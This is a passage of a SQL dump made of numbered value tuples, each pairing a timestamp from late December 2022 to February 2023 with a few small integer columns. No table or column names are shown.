(3494, '2022-12-29 17:21:30', 1, 2060, 0, 1, 1),
(3495, '2022-12-30 16:17:07', 1, 2054, 0, 1, 1),
(3496, '2022-12-30 16:39:36', 1, 2054, 0, 1, 1),
(3497, '2022-12-30 17:57:00', 1, 2061, 0, 1, 1),
(3498, '2022-12-30 17:57:08', 1, 2061, 0, 1, 1),
(3499, '2022-12-31 02:20:07', 1, 2064, 0, 1, 1),
(3500, '2022-12-31 03:31:40', 1, 2059, 0, 1, 1),
(3501, '2022-12-31 23:06:17', 1, 2061, 0, 1, 1),
(3502, '2023-01-01 00:54:04', 1, 2059, 0, 1, 1),
(3503, '2023-01-01 02:57:12', 1, 2062, 0, 1, 1),
(3504, '2023-01-01 08:51:15', 1, 2064, 0, 1, 1),
(3505, '2023-01-01 10:16:33', 1, 2054, 0, 1, 1),
(3506, '2023-01-01 10:16:37', 1, 2055, 0, 1, 1),
(3507, '2023-01-01 10:16:56', 1, 2064, 0, 1, 1),
(3508, '2023-01-01 10:17:13', 1, 2063, 0, 1, 1),
(3509, '2023-01-01 10:17:18', 1, 2062, 0, 1, 1),
(3510, '2023-01-01 10:17:27', 1, 2060, 0, 1, 1),
(3511, '2023-01-01 10:17:32', 1, 2059, 0, 1, 1),
(3512, '2023-01-01 10:17:39', 1, 2061, 0, 1, 1),
(3513, '2023-01-01 10:17:42', 1, 2058, 0, 1, 1),
(3514, '2023-01-01 14:15:45', 1, 2053, 0, 1, 1),
(3515, '2023-01-01 14:28:57', 1, 2064, 0, 1, 1),
(3516, '2023-01-01 14:29:13', 1, 2063, 0, 1, 1),
(3517, '2023-01-01 14:29:31', 1, 2062, 0, 1, 1),
(3518, '2023-01-01 14:29:40', 1, 2061, 0, 1, 1),
(3519, '2023-01-01 14:29:50', 1, 2060, 0, 1, 1),
(3520, '2023-01-01 14:30:01', 1, 2059, 0, 1, 1),
(3521, '2023-01-01 14:30:13', 1, 2058, 0, 1, 1),
(3522, '2023-01-01 14:30:23', 1, 2055, 0, 1, 1),
(3523, '2023-01-01 14:30:40', 1, 2054, 0, 1, 1),
(3524, '2023-01-01 14:47:42', 1, 2053, 0, 1, 1),
(3525, '2023-01-01 19:47:02', 1, 2064, 0, 1, 1),
(3526, '2023-01-02 00:07:16', 1, 2055, 0, 1, 1),
(3527, '2023-01-02 00:10:36', 1, 2053, 0, 1, 1),
(3528, '2023-01-02 00:25:00', 1, 2064, 0, 1, 1),
(3529, '2023-01-02 05:35:04', 1, 2064, 0, 1, 1),
(3530, '2023-01-02 05:35:15', 1, 2055, 0, 1, 1),
(3531, '2023-01-02 05:35:18', 1, 2064, 0, 1, 1),
(3532, '2023-01-02 05:35:21', 1, 2061, 0, 1, 1),
(3533, '2023-01-02 05:35:24', 1, 2058, 0, 1, 1),
(3534, '2023-01-02 17:30:22', 1, 2063, 0, 1, 1),
(3535, '2023-01-02 17:30:28', 1, 2063, 0, 1, 1),
(3536, '2023-01-02 19:55:27', 1, 2055, 0, 1, 1),
(3537, '2023-01-03 07:54:40', 1, 2063, 0, 1, 1),
(3538, '2023-01-03 07:55:19', 1, 2063, 0, 1, 1),
(3539, '2023-01-03 11:23:16', 1, 2064, 0, 1, 1),
(3540, '2023-01-03 16:06:09', 1, 2064, 0, 1, 1),
(3541, '2023-01-04 02:35:47', 1, 2064, 0, 1, 1),
(3542, '2023-01-04 03:02:51', 1, 2053, 0, 1, 1),
(3543, '2023-01-04 08:08:25', 1, 2061, 0, 1, 1),
(3544, '2023-01-04 09:01:29', 1, 2059, 0, 1, 1),
(3545, '2023-01-04 18:36:21', 1, 2061, 0, 1, 1),
(3546, '2023-01-04 20:12:01', 1, 2061, 0, 1, 1),
(3547, '2023-01-05 05:21:12', 1, 2064, 0, 1, 1),
(3548, '2023-01-05 05:39:09', 1, 2063, 0, 1, 1),
(3549, '2023-01-05 11:39:29', 1, 2062, 0, 1, 1),
(3550, '2023-01-05 18:41:45', 1, 2062, 0, 1, 1),
(3551, '2023-01-05 18:47:31', 1, 2062, 0, 1, 1),
(3552, '2023-01-05 21:50:13', 1, 2054, 0, 1, 1),
(3553, '2023-01-06 01:38:22', 1, 2061, 0, 1, 1),
(3554, '2023-01-06 08:24:56', 1, 2058, 0, 1, 1),
(3555, '2023-01-06 19:58:16', 1, 2064, 0, 1, 1),
(3556, '2023-01-06 19:58:17', 1, 2061, 0, 1, 1),
(3557, '2023-01-07 01:59:53', 1, 2055, 0, 1, 1),
(3558, '2023-01-07 09:29:40', 1, 2064, 0, 1, 1),
(3559, '2023-01-08 04:47:47', 1, 2060, 0, 1, 1),
(3560, '2023-01-08 13:06:57', 1, 2054, 0, 1, 1),
(3561, '2023-01-08 15:40:20', 1, 2063, 0, 1, 1),
(3562, '2023-01-09 02:57:04', 1, 2063, 0, 1, 1),
(3563, '2023-01-09 05:13:31', 1, 2054, 0, 1, 1),
(3564, '2023-01-09 13:41:28', 1, 2064, 0, 1, 1),
(3565, '2023-01-09 22:47:27', 1, 2064, 0, 1, 1),
(3566, '2023-01-10 02:33:26', 1, 2053, 0, 1, 1),
(3567, '2023-01-10 04:49:41', 1, 2053, 0, 1, 1),
(3568, '2023-01-10 12:54:33', 1, 2064, 0, 1, 1),
(3569, '2023-01-10 14:40:06', 1, 2061, 0, 1, 1),
(3570, '2023-01-10 14:40:14', 1, 2061, 0, 1, 1),
(3571, '2023-01-10 18:25:24', 1, 2058, 0, 1, 1),
(3572, '2023-01-10 18:25:39', 1, 2064, 0, 1, 1),
(3573, '2023-01-10 18:25:56', 1, 2062, 0, 1, 1),
(3574, '2023-01-10 18:25:58', 1, 2055, 0, 1, 1),
(3575, '2023-01-10 18:26:07', 1, 2059, 0, 1, 1),
(3576, '2023-01-10 18:26:08', 1, 2063, 0, 1, 1),
(3577, '2023-01-10 18:26:10', 1, 2061, 0, 1, 1),
(3578, '2023-01-10 18:26:19', 1, 2060, 0, 1, 1),
(3579, '2023-01-10 18:26:26', 1, 2054, 0, 1, 1),
(3580, '2023-01-10 18:28:42', 1, 2058, 0, 1, 1),
(3581, '2023-01-10 18:28:53', 1, 2054, 0, 1, 1),
(3582, '2023-01-10 18:28:57', 1, 2064, 0, 1, 1),
(3583, '2023-01-10 18:29:04', 1, 2062, 0, 1, 1),
(3584, '2023-01-10 18:29:05', 1, 2055, 0, 1, 1),
(3585, '2023-01-10 18:29:16', 1, 2059, 0, 1, 1),
(3586, '2023-01-10 18:29:21', 1, 2063, 0, 1, 1),
(3587, '2023-01-10 18:29:25', 1, 2061, 0, 1, 1),
(3588, '2023-01-10 18:29:27', 1, 2060, 0, 1, 1),
(3589, '2023-01-10 18:29:52', 1, 2053, 0, 1, 1),
(3590, '2023-01-10 18:39:59', 1, 2058, 0, 1, 1),
(3591, '2023-01-10 18:40:18', 1, 2061, 0, 1, 1),
(3592, '2023-01-10 18:40:25', 1, 2059, 0, 1, 1),
(3593, '2023-01-10 18:40:29', 1, 2060, 0, 1, 1),
(3594, '2023-01-10 18:40:35', 1, 2062, 0, 1, 1),
(3595, '2023-01-10 18:40:40', 1, 2063, 0, 1, 1),
(3596, '2023-01-10 18:40:45', 1, 2064, 0, 1, 1),
(3597, '2023-01-10 18:41:42', 1, 2055, 0, 1, 1),
(3598, '2023-01-10 18:41:52', 1, 2054, 0, 1, 1),
(3599, '2023-01-10 18:52:00', 1, 2061, 0, 1, 1),
(3600, '2023-01-10 19:08:56', 1, 2058, 0, 1, 1),
(3601, '2023-01-10 19:09:10', 1, 2061, 0, 1, 1),
(3602, '2023-01-10 19:09:15', 1, 2059, 0, 1, 1),
(3603, '2023-01-10 19:09:18', 1, 2060, 0, 1, 1),
(3604, '2023-01-10 19:09:22', 1, 2062, 0, 1, 1),
(3605, '2023-01-10 19:09:26', 1, 2063, 0, 1, 1),
(3606, '2023-01-10 19:09:31', 1, 2064, 0, 1, 1),
(3607, '2023-01-10 19:10:11', 1, 2055, 0, 1, 1),
(3608, '2023-01-10 19:10:17', 1, 2054, 0, 1, 1),
(3609, '2023-01-10 19:10:23', 1, 2053, 0, 1, 1),
(3610, '2023-01-10 19:54:40', 1, 2053, 0, 1, 1),
(3611, '2023-01-10 23:50:55', 1, 2063, 0, 1, 1),
(3612, '2023-01-11 00:50:52', 1, 2064, 0, 1, 1),
(3613, '2023-01-11 02:14:47', 1, 2063, 0, 1, 1),
(3614, '2023-01-11 03:42:46', 1, 2060, 0, 1, 1),
(3615, '2023-01-11 03:49:02', 1, 2064, 0, 1, 1),
(3616, '2023-01-11 04:01:09', 1, 2055, 0, 1, 1),
(3617, '2023-01-11 04:43:34', 1, 2055, 0, 1, 1),
(3618, '2023-01-11 07:31:00', 1, 2054, 0, 1, 1),
(3619, '2023-01-11 20:37:41', 1, 2063, 0, 1, 1),
(3620, '2023-01-11 22:15:53', 1, 2061, 0, 1, 1),
(3621, '2023-01-12 02:47:08', 1, 2054, 0, 1, 1),
(3622, '2023-01-12 04:30:48', 1, 2055, 0, 1, 1),
(3623, '2023-01-12 05:57:03', 1, 2063, 0, 1, 1),
(3624, '2023-01-12 08:04:59', 1, 2064, 0, 1, 1),
(3625, '2023-01-12 15:12:48', 1, 2063, 0, 1, 1),
(3626, '2023-01-12 18:32:33', 1, 2064, 0, 1, 1),
(3627, '2023-01-12 18:32:38', 1, 2059, 0, 1, 1),
(3628, '2023-01-12 18:32:46', 1, 2055, 0, 1, 1),
(3629, '2023-01-12 18:32:47', 1, 2062, 0, 1, 1),
(3630, '2023-01-12 18:32:57', 1, 2053, 0, 1, 1),
(3631, '2023-01-13 00:20:30', 1, 2054, 0, 1, 1),
(3632, '2023-01-13 08:41:14', 1, 2062, 0, 1, 1),
(3633, '2023-01-13 08:41:15', 1, 2062, 0, 1, 1),
(3634, '2023-01-13 16:45:07', 1, 2059, 0, 1, 1),
(3635, '2023-01-13 17:52:59', 1, 2060, 0, 1, 1),
(3636, '2023-01-13 17:53:34', 1, 2060, 0, 1, 1),
(3637, '2023-01-13 17:53:43', 1, 2060, 0, 1, 1),
(3638, '2023-01-13 18:55:07', 1, 2064, 0, 1, 1),
(3639, '2023-01-13 21:41:58', 1, 2058, 0, 1, 1),
(3640, '2023-01-13 23:54:04', 1, 2064, 0, 1, 1),
(3641, '2023-01-14 08:47:26', 1, 2060, 0, 1, 1),
(3642, '2023-01-14 09:01:37', 1, 2063, 0, 1, 1),
(3643, '2023-01-14 09:37:26', 1, 2058, 0, 1, 1),
(3644, '2023-01-14 10:38:12', 1, 2060, 0, 1, 1),
(3645, '2023-01-14 10:53:42', 1, 2063, 0, 1, 1),
(3646, '2023-01-14 11:31:59', 1, 2058, 0, 1, 1),
(3647, '2023-01-14 12:45:28', 1, 2055, 0, 1, 1),
(3648, '2023-01-14 14:21:12', 1, 2062, 0, 1, 1),
(3649, '2023-01-14 14:24:12', 1, 2062, 0, 1, 1),
(3650, '2023-01-14 14:57:39', 1, 2061, 0, 1, 1),
(3651, '2023-01-14 16:18:36', 1, 2062, 0, 1, 1),
(3652, '2023-01-14 18:47:36', 1, 2054, 0, 1, 1),
(3653, '2023-01-14 18:49:34', 1, 2055, 0, 1, 1),
(3654, '2023-01-14 18:49:35', 1, 2058, 0, 1, 1),
(3655, '2023-01-14 18:49:36', 1, 2059, 0, 1, 1),
(3656, '2023-01-14 18:49:37', 1, 2061, 0, 1, 1),
(3657, '2023-01-14 18:49:38', 1, 2054, 0, 1, 1),
(3658, '2023-01-14 18:49:39', 1, 2062, 0, 1, 1),
(3659, '2023-01-14 18:49:40', 1, 2064, 0, 1, 1),
(3660, '2023-01-14 18:49:41', 1, 2063, 0, 1, 1),
(3661, '2023-01-14 18:49:44', 1, 2060, 0, 1, 1),
(3662, '2023-01-14 18:49:47', 1, 2053, 0, 1, 1),
(3663, '2023-01-14 19:34:02', 1, 2060, 0, 1, 1),
(3664, '2023-01-14 19:43:45', 1, 2063, 0, 1, 1),
(3665, '2023-01-14 20:07:45', 1, 2058, 0, 1, 1),
(3666, '2023-01-14 20:54:34', 1, 2055, 0, 1, 1),
(3667, '2023-01-14 22:27:51', 1, 2061, 0, 1, 1),
(3668, '2023-01-14 23:05:47', 1, 2059, 0, 1, 1),
(3669, '2023-01-14 23:19:33', 1, 2062, 0, 1, 1),
(3670, '2023-01-15 01:23:21', 1, 2054, 0, 1, 1),
(3671, '2023-01-15 01:46:49', 1, 2059, 0, 1, 1),
(3672, '2023-01-15 02:06:41', 1, 2064, 0, 1, 1),
(3673, '2023-01-15 07:32:50', 1, 2063, 0, 1, 1),
(3674, '2023-01-15 09:10:17', 1, 2054, 0, 1, 1),
(3675, '2023-01-15 09:10:20', 1, 2055, 0, 1, 1),
(3676, '2023-01-15 09:10:34', 1, 2064, 0, 1, 1),
(3677, '2023-01-15 09:10:40', 1, 2063, 0, 1, 1),
(3678, '2023-01-15 09:10:44', 1, 2062, 0, 1, 1),
(3679, '2023-01-15 09:10:48', 1, 2060, 0, 1, 1),
(3680, '2023-01-15 09:10:51', 1, 2059, 0, 1, 1),
(3681, '2023-01-15 09:10:54', 1, 2061, 0, 1, 1),
(3682, '2023-01-15 09:10:58', 1, 2058, 0, 1, 1),
(3683, '2023-01-15 15:03:22', 1, 2053, 0, 1, 1),
(3684, '2023-01-15 18:26:28', 1, 2053, 0, 1, 1),
(3685, '2023-01-15 21:21:55', 1, 2064, 0, 1, 1),
(3686, '2023-01-15 21:22:02', 1, 2053, 0, 1, 1),
(3687, '2023-01-15 21:34:47', 1, 2061, 0, 1, 1),
(3688, '2023-01-15 22:22:28', 1, 2060, 0, 1, 1),
(3689, '2023-01-16 09:39:43', 1, 2053, 0, 1, 1),
(3690, '2023-01-16 12:05:37', 1, 2064, 0, 1, 1),
(3691, '2023-01-16 23:59:57', 1, 2064, 0, 1, 1),
(3692, '2023-01-17 04:14:37', 1, 2055, 0, 1, 1),
(3693, '2023-01-17 08:14:21', 1, 2063, 0, 1, 1),
(3694, '2023-01-17 19:30:18', 1, 2055, 0, 1, 1),
(3695, '2023-01-18 03:15:11', 1, 2059, 0, 1, 1),
(3696, '2023-01-18 10:10:48', 1, 2063, 0, 1, 1),
(3697, '2023-01-18 10:11:01', 4, 2063, 685, 1, 1),
(3698, '2023-01-18 13:24:26', 1, 2059, 0, 1, 1),
(3699, '2023-01-18 20:17:45', 1, 2059, 0, 1, 1),
(3700, '2023-01-19 04:44:45', 1, 2064, 0, 1, 1),
(3701, '2023-01-19 16:50:20', 1, 2063, 0, 1, 1),
(3702, '2023-01-20 00:56:42', 1, 2054, 0, 1, 1),
(3703, '2023-01-20 10:35:30', 1, 2061, 0, 1, 1),
(3704, '2023-01-20 19:42:03', 1, 2053, 0, 1, 1),
(3705, '2023-01-21 13:46:35', 1, 2060, 0, 1, 1),
(3706, '2023-01-21 18:10:10', 1, 2064, 0, 1, 1),
(3707, '2023-01-21 23:08:55', 1, 2064, 0, 1, 1),
(3708, '2023-01-22 05:03:01', 1, 2063, 0, 1, 1),
(3709, '2023-01-22 14:01:07', 1, 2064, 0, 1, 1),
(3710, '2023-01-22 21:58:50', 1, 2064, 0, 1, 1),
(3711, '2023-01-23 00:31:35', 1, 2064, 0, 1, 1),
(3712, '2023-01-23 00:53:10', 1, 2053, 0, 1, 1),
(3713, '2023-01-23 13:30:29', 1, 2063, 0, 1, 1),
(3714, '2023-01-23 14:34:22', 1, 2061, 0, 1, 1),
(3715, '2023-01-23 14:47:31', 1, 2055, 0, 1, 1),
(3716, '2023-01-23 15:38:03', 1, 2059, 0, 1, 1),
(3717, '2023-01-23 16:14:23', 1, 2061, 0, 1, 1),
(3718, '2023-01-23 16:17:25', 1, 2062, 0, 1, 1),
(3719, '2023-01-24 01:50:09', 1, 2063, 0, 1, 1),
(3720, '2023-01-24 10:54:23', 1, 2055, 0, 1, 1),
(3721, '2023-01-24 15:59:54', 1, 2064, 0, 1, 1),
(3722, '2023-01-24 18:23:52', 1, 2064, 0, 1, 1),
(3723, '2023-01-24 19:14:19', 1, 2054, 0, 1, 1),
(3724, '2023-01-24 19:19:53', 1, 2060, 0, 1, 1),
(3725, '2023-01-25 14:29:58', 1, 2060, 0, 1, 1),
(3726, '2023-01-25 14:30:41', 1, 2060, 0, 1, 1),
(3727, '2023-01-25 16:29:37', 1, 2054, 0, 1, 1),
(3728, '2023-01-26 05:52:55', 1, 2064, 0, 1, 1),
(3729, '2023-01-26 08:16:51', 1, 2055, 0, 1, 1),
(3730, '2023-01-26 08:16:54', 1, 2064, 0, 1, 1),
(3731, '2023-01-26 08:16:58', 1, 2063, 0, 1, 1),
(3732, '2023-01-26 08:17:01', 1, 2062, 0, 1, 1),
(3733, '2023-01-26 08:17:04', 1, 2060, 0, 1, 1),
(3734, '2023-01-26 09:04:37', 1, 2064, 0, 1, 1),
(3735, '2023-01-26 11:40:45', 1, 2062, 0, 1, 1),
(3736, '2023-01-26 11:42:24', 1, 2062, 0, 1, 1),
(3737, '2023-01-27 03:29:29', 1, 2053, 0, 1, 1),
(3738, '2023-01-27 06:22:17', 1, 2060, 0, 1, 1),
(3739, '2023-01-27 06:32:55', 1, 2063, 0, 1, 1),
(3740, '2023-01-27 07:01:02', 1, 2058, 0, 1, 1),
(3741, '2023-01-27 07:51:11', 1, 2055, 0, 1, 1),
(3742, '2023-01-27 09:04:42', 1, 2061, 0, 1, 1),
(3743, '2023-01-27 09:41:56', 1, 2062, 0, 1, 1),
(3744, '2023-01-27 10:53:56', 1, 2054, 0, 1, 1),
(3745, '2023-01-27 11:08:59', 1, 2059, 0, 1, 1),
(3746, '2023-01-27 11:21:21', 1, 2064, 0, 1, 1),
(3747, '2023-01-27 22:27:00', 1, 2060, 0, 1, 1),
(3748, '2023-01-27 22:36:58', 1, 2063, 0, 1, 1),
(3749, '2023-01-27 23:03:31', 1, 2058, 0, 1, 1),
(3750, '2023-01-27 23:51:51', 1, 2055, 0, 1, 1),
(3751, '2023-01-28 01:04:29', 1, 2061, 0, 1, 1),
(3752, '2023-01-28 01:41:23', 1, 2062, 0, 1, 1),
(3753, '2023-01-28 02:51:33', 1, 2054, 0, 1, 1),
(3754, '2023-01-28 03:07:07', 1, 2059, 0, 1, 1),
(3755, '2023-01-28 03:19:46', 1, 2064, 0, 1, 1),
(3756, '2023-01-28 09:30:18', 1, 2064, 0, 1, 1),
(3757, '2023-01-28 13:10:56', 1, 2060, 0, 1, 1),
(3758, '2023-01-28 13:11:29', 1, 2060, 0, 1, 1),
(3759, '2023-01-28 13:56:25', 1, 2063, 0, 1, 1),
(3760, '2023-01-28 19:46:24', 1, 2060, 0, 1, 1),
(3761, '2023-01-28 19:56:34', 1, 2063, 0, 1, 1),
(3762, '2023-01-28 20:23:24', 1, 2058, 0, 1, 1),
(3763, '2023-01-28 21:11:47', 1, 2055, 0, 1, 1),
(3764, '2023-01-28 22:23:50', 1, 2061, 0, 1, 1),
(3765, '2023-01-28 22:43:34', 1, 2064, 0, 1, 1),
(3766, '2023-01-28 23:00:18', 1, 2062, 0, 1, 1),
(3767, '2023-01-29 00:09:40', 1, 2054, 0, 1, 1),
(3768, '2023-01-29 00:24:40', 1, 2059, 0, 1, 1),
(3769, '2023-01-29 00:37:09', 1, 2064, 0, 1, 1),
(3770, '2023-01-29 00:38:43', 1, 2054, 0, 1, 1),
(3771, '2023-01-29 00:38:49', 1, 2055, 0, 1, 1),
(3772, '2023-01-29 00:39:01', 1, 2064, 0, 1, 1),
(3773, '2023-01-29 00:39:07', 1, 2063, 0, 1, 1),
(3774, '2023-01-29 00:39:19', 1, 2062, 0, 1, 1),
(3775, '2023-01-29 00:39:23', 1, 2060, 0, 1, 1),
(3776, '2023-01-29 00:39:27', 1, 2059, 0, 1, 1),
(3777, '2023-01-29 00:39:31', 1, 2061, 0, 1, 1),
(3778, '2023-01-29 00:39:34', 1, 2058, 0, 1, 1),
(3779, '2023-01-29 05:01:09', 1, 2055, 0, 1, 1),
(3780, '2023-01-29 06:56:06', 1, 2063, 0, 1, 1),
(3781, '2023-01-29 13:00:12', 1, 2063, 0, 1, 1),
(3782, '2023-01-29 21:47:30', 1, 2053, 0, 1, 1),
(3783, '2023-01-30 00:01:44', 1, 2054, 0, 1, 1),
(3784, '2023-01-30 00:01:47', 1, 2055, 0, 1, 1),
(3785, '2023-01-30 00:01:52', 1, 2064, 0, 1, 1),
(3786, '2023-01-30 00:01:53', 1, 2063, 0, 1, 1),
(3787, '2023-01-30 00:01:59', 1, 2062, 0, 1, 1),
(3788, '2023-01-30 00:02:01', 1, 2060, 0, 1, 1),
(3789, '2023-01-30 00:02:02', 1, 2059, 0, 1, 1),
(3790, '2023-01-30 00:02:03', 1, 2061, 0, 1, 1),
(3791, '2023-01-30 00:02:05', 1, 2058, 0, 1, 1),
(3792, '2023-01-30 03:18:43', 1, 2064, 0, 1, 1),
(3793, '2023-01-30 04:12:50', 1, 2063, 0, 1, 1),
(3794, '2023-01-30 04:12:51', 1, 2063, 0, 1, 1),
(3795, '2023-01-30 09:42:24', 1, 2060, 0, 1, 1),
(3796, '2023-01-30 14:00:31', 1, 2054, 0, 1, 1),
(3797, '2023-01-30 14:13:51', 1, 2059, 0, 1, 1),
(3798, '2023-01-31 08:39:52', 1, 2061, 0, 1, 1),
(3799, '2023-01-31 10:11:09', 1, 2064, 0, 1, 1),
(3800, '2023-01-31 13:43:03', 1, 2063, 0, 1, 1),
(3801, '2023-01-31 14:21:04', 1, 2064, 0, 1, 1),
(3802, '2023-01-31 16:53:53', 1, 2058, 0, 1, 1),
(3803, '2023-02-01 05:54:53', 1, 2060, 0, 1, 1),
(3804, '2023-02-01 05:56:09', 1, 2060, 0, 1, 1),
(3805, '2023-02-01 11:44:15', 1, 2055, 0, 1, 1),
(3806, '2023-02-01 14:25:33', 1, 2053, 0, 1, 1),
(3807, '2023-02-02 00:04:42', 1, 2053, 0, 1, 1),
(3808, '2023-02-02 00:05:10', 1, 2054, 0, 1, 1),
(3809, '2023-02-02 00:05:35', 1, 2055, 0, 1, 1),
(3810, '2023-02-02 00:07:16', 1, 2064, 0, 1, 1),
(3811, '2023-02-02 00:08:06', 1, 2063, 0, 1, 1),
(3812, '2023-02-02 00:08:31', 1, 2062, 0, 1, 1),
(3813, '2023-02-02 00:08:56', 1, 2060, 0, 1, 1),
(3814, '2023-02-02 00:09:21', 1, 2059, 0, 1, 1),
(3815, '2023-02-02 00:09:46', 1, 2061, 0, 1, 1),
(3816, '2023-02-02 00:10:11', 1, 2058, 0, 1, 1),
(3817, '2023-02-02 14:37:02', 1, 2064, 0, 1, 1),
(3818, '2023-02-02 16:52:43', 1, 2061, 0, 1, 1),
(3819, '2023-02-03 02:56:22', 1, 2060, 0, 1, 1),
(3820, '2023-02-03 03:41:32', 1, 2061, 0, 1, 1),
(3821, '2023-02-03 03:58:14', 1, 2063, 0, 1, 1),
(3822, '2023-02-03 03:59:06', 1, 2064, 0, 1, 1),
(3823, '2023-02-03 11:58:50', 1, 2062, 0, 1, 1),
(3824, '2023-02-03 12:36:56', 1, 2061, 0, 1, 1),
(3825, '2023-02-03 12:36:58', 1, 2064, 0, 1, 1),
(3826, '2023-02-03 12:36:59', 1, 2062, 0, 1, 1),
(3827, '2023-02-03 12:36:59', 1, 2060, 0, 1, 1),
(3828, '2023-02-03 12:37:01', 1, 2058, 0, 1, 1),
(3829, '2023-02-03 12:37:02', 1, 2054, 0, 1, 1),
(3830, '2023-02-03 12:37:03', 1, 2063, 0, 1, 1),
(3831, '2023-02-03 12:37:04', 1, 2055, 0, 1, 1),
(3832, '2023-02-03 12:37:05', 1, 2059, 0, 1, 1),
(3833, '2023-02-03 19:47:52', 1, 2055, 0, 1, 1),
(3834, '2023-02-04 11:26:24', 1, 2063, 0, 1, 1),
(3835, '2023-02-04 11:26:28', 1, 2062, 0, 1, 1),
(3836, '2023-02-04 11:27:02', 1, 2062, 0, 1, 1),
(3837, '2023-02-04 11:27:11', 1, 2062, 0, 1, 1),
(3838, '2023-02-04 17:48:57', 1, 2063, 0, 1, 1),
(3839, '2023-02-04 19:39:44', 1, 2064, 0, 1, 1),
(3840, '2023-02-04 21:03:30', 1, 2061, 0, 1, 1),
(3841, '2023-02-04 21:04:57', 1, 2061, 0, 1, 1),
(3842, '2023-02-04 21:40:59', 1, 2063, 0, 1, 1),
(3843, '2023-02-05 05:54:46', 1, 2060, 0, 1, 1),
(3844, '2023-02-05 05:57:28', 1, 2061, 0, 1, 1),
(3845, '2023-02-05 05:58:56', 1, 2061, 0, 1, 1),
(3846, '2023-02-05 09:01:55', 1, 2064, 0, 1, 1),
(3847, '2023-02-05 12:02:24', 1, 2054, 0, 1, 1),
(3848, '2023-02-05 12:50:13', 1, 2060, 0, 1, 1),
(3849, '2023-02-05 13:39:18', 1, 2061, 0, 1, 1),
(3850, '2023-02-05 14:54:13', 1, 2059, 0, 1, 1),
(3851, '2023-02-05 15:53:42', 1, 2064, 0, 1, 1),
(3852, '2023-02-05 16:52:09', 1, 2062, 0, 1, 1),
(3853, '2023-02-05 18:19:18', 1, 2055, 0, 1, 1),
(3854, '2023-02-05 19:26:56', 1, 2063, 0, 1, 1),
(3855, '2023-02-05 19:46:41', 1, 2058, 0, 1, 1),
(3856, '2023-02-05 20:02:21', 1, 2064, 0, 1, 1),
(3857, '2023-02-05 21:04:44', 1, 2054, 0, 1, 1),
(3858, '2023-02-05 21:51:52', 1, 2060, 0, 1, 1),
(3859, '2023-02-05 22:28:35', 1, 2061, 0, 1, 1),
(3860, '2023-02-05 23:31:49', 1, 2059, 0, 1, 1),
(3861, '2023-02-06 00:25:26', 1, 2064, 0, 1, 1),
(3862, '2023-02-06 01:18:49', 1, 2062, 0, 1, 1),
(3863, '2023-02-06 01:52:20', 1, 2053, 0, 1, 1),
(3864, '2023-02-06 02:05:42', 1, 2054, 0, 1, 1),
(3865, '2023-02-06 02:42:26', 1, 2055, 0, 1, 1),
(3866, '2023-02-06 03:48:25', 1, 2063, 0, 1, 1),
(3867, '2023-02-06 04:07:16', 1, 2058, 0, 1, 1),
(3868, '2023-02-06 16:18:36', 1, 2054, 0, 1, 1),
(3869, '2023-02-06 17:04:41', 1, 2060, 0, 1, 1),
(3870, '2023-02-06 18:09:04', 1, 2054, 0, 1, 1),
(3871, '2023-02-06 19:02:47', 1, 2054, 0, 1, 1),
(3872, '2023-02-06 20:08:13', 1, 2060, 0, 1, 1),
(3873, '2023-02-06 21:28:35', 1, 2061, 0, 1, 1),
(3874, '2023-02-06 22:55:19', 1, 2059, 0, 1, 1),
(3875, '2023-02-06 23:24:43', 1, 2058, 0, 1, 1),
(3876, '2023-02-07 00:13:42', 1, 2064, 0, 1, 1),
(3877, '2023-02-07 01:28:12', 1, 2062, 0, 1, 1),
(3878, '2023-02-07 03:25:11', 1, 2055, 0, 1, 1),
(3879, '2023-02-07 04:58:18', 1, 2063, 0, 1, 1),
(3880, '2023-02-07 05:26:06', 1, 2058, 0, 1, 1),
(3881, '2023-02-07 06:01:24', 1, 2059, 0, 1, 1),
(3882, '2023-02-07 07:59:12', 1, 2058, 0, 1, 1),
(3883, '2023-02-07 07:59:21', 1, 2064, 0, 1, 1),
(3884, '2023-02-07 07:59:25', 1, 2054, 0, 1, 1),
(3885, '2023-02-07 07:59:38', 1, 2060, 0, 1, 1),
(3886, '2023-02-07 07:59:42', 1, 2062, 0, 1, 1),
(3887, '2023-02-07 07:59:44', 1, 2055, 0, 1, 1),
(3888, '2023-02-07 07:59:53', 1, 2059, 0, 1, 1),
(3889, '2023-02-07 07:59:56', 1, 2063, 0, 1, 1),
(3890, '2023-02-07 07:59:59', 1, 2061, 0, 1, 1),
(3891, '2023-02-07 08:01:46', 1, 2058, 0, 1, 1),
(3892, '2023-02-07 08:01:57', 1, 2064, 0, 1, 1),
(3893, '2023-02-07 08:01:59', 1, 2054, 0, 1, 1),
(3894, '2023-02-07 08:02:04', 1, 2060, 0, 1, 1),
(3895, '2023-02-07 08:02:11', 1, 2061, 0, 1, 1),
(3896, '2023-02-07 08:02:17', 1, 2063, 0, 1, 1),
(3897, '2023-02-07 08:02:20', 1, 2062, 0, 1, 1),
(3898, '2023-02-07 08:02:23', 1, 2059, 0, 1, 1),
(3899, '2023-02-07 08:02:25', 1, 2055, 0, 1, 1),
(3900, '2023-02-07 08:02:43', 1, 2053, 0, 1, 1),
(3901, '2023-02-07 10:33:14', 1, 2055, 0, 1, 1),
(3902, '2023-02-07 15:33:31', 1, 2061, 0, 1, 1),
(3903, '2023-02-07 16:51:38', 1, 2061, 0, 1, 1),
(3904, '2023-02-08 04:12:53', 1, 2064, 0, 1, 1),
(3905, '2023-02-08 05:42:52', 1, 2059, 0, 1, 1),
(3906, '2023-02-08 16:51:41', 1, 2061, 0, 1, 1),
(3907, '2023-02-09 02:09:35', 1, 2064, 0, 1, 1),
(3908, '2023-02-09 02:18:46', 1, 2054, 0, 1, 1),
(3909, '2023-02-09 05:09:09', 1, 2064, 0, 1, 1),
(3910, '2023-02-09 06:35:39', 1, 2063, 0, 1, 1),
(3911, '2023-02-09 16:54:04', 1, 2061, 0, 1, 1),
(3912, '2023-02-09 18:54:26', 1, 2063, 0, 1, 1),
(3913, '2023-02-09 20:03:48', 1, 2055, 0, 1, 1),
(3914, '2023-02-10 04:17:43', 1, 2054, 0, 1, 1),
(3915, '2023-02-10 15:14:45', 1, 2061, 0, 1, 1),
(3916, '2023-02-10 18:24:56', 1, 2064, 0, 1, 1),
(3917, '2023-02-11 02:35:31', 1, 2061, 0, 1, 1),
(3918, '2023-02-11 05:10:25', 1, 2062, 0, 1, 1),
(3919, '2023-02-11 06:41:54', 1, 2053, 0, 1, 1),
(3920, '2023-02-11 10:26:55', 1, 2063, 0, 1, 1),
(3921, '2023-02-11 13:12:59', 1, 2059, 0, 1, 1),
